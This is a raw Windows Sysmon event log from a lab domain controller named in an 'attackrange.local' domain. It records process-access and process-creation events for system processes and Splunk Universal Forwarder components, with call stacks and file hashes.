16:11:08.455{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-561C-6008-0207-00000000A301}7264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561C-6008-0207-00000000A301}7264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.457{7901BC46-561C-6008-0207-00000000A301}7264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.564{7901BC46-561D-6008-0307-00000000A301}59885392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561D-6008-0307-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-561D-6008-0307-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.424{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561D-6008-0307-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:09.425{7901BC46-561D-6008-0307-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561E-6008-0507-00000000A301}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-561E-6008-0507-00000000A301}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561E-6008-0507-00000000A301}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.846{7901BC46-561E-6008-0507-00000000A301}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.236{7901BC46-561E-6008-0407-00000000A301}45565488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561E-6008-0407-00000000A301}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-561E-6008-0407-00000000A301}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561E-6008-0407-00000000A301}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 